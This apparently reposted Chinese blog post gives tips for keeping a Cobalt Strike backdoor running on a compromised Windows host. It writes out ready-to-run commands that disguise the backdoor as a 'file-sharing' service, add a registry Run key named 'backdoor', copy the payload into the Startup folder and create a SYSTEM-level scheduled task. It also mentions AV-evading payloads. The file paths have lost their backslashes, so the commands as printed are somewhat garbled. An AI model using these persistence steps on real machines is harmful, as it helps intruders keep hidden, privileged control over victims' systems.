CS后门实现windows下持久化Tips

2022年4月10日00:23:09评论260 views字数 1063阅读3分32秒阅读模式

1 前言

后门利用持久化是内外渗透一项基本功，平常程序主要通过系统服务、注册表、开始菜单启动等三种方式实现程序自启，后门也是如此。

首先使用cobalt strike生成木马程序，这里可以看到已经有一台受控端上线。

2 系统服务自启

直接控制台执行以下命令即可，或者直接新建个bat文件-上传-执行也可以

sc create "Share" binpath= "C:UsersxiaomDesktoptest.exe"sc description "Share" "Windwos文件共享服务"sc config "Share" start= autonet start "Share"

默认情况下，会提示拒绝访问，意思是权限不够。

可以看到已经上线，但是几秒后就关闭了。因为直接使用cs生成的exe木马无法通过服务自启动，会报错：服务没有及时响应启动或控制请求。

可以使用免杀马通过以上方式实现自启，并且还是system权限。

3 注册表自启

利用控制台reg命令新增一个名为“后门”的自启项，权限是管理员，但不是system。

reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v "后门" /t REG_SZ /d "C:UsersxiaomDesktoptest.exe" /f

4 开始菜单自启

利用copy将后门复制到开始菜单中的“启动”里面也可以实现自启。比较简单就不配图了。权限是管理员，但不是system

copy C:usersxiaomdesktoptest.exe "%programdata%MicrosoftWindowsStart MenuProgramsStartup"

5 计划任务自启

任务计划自启是最近恶意软件经常使用的手段，使用简单更隐蔽。

通过下面命令，可以实现开机自启，且为system权限～，非常强大。

schtasks /create /tn "后门" /tr C:usersxiaomdesktoptest.exe /sc onstart /NP /ru "System" start %systemroot% tasks

若要删除任务

schtasks /delete /tn "后门" /F

6 结尾

文章出处“来源梦屿千寻个人博客”。

http://www.baikesec.com/webstudy/penetration/38.html

原文始发于微信公众号（Reset安全）：CS后门实现windows下持久化Tips

若依系统恰分攻略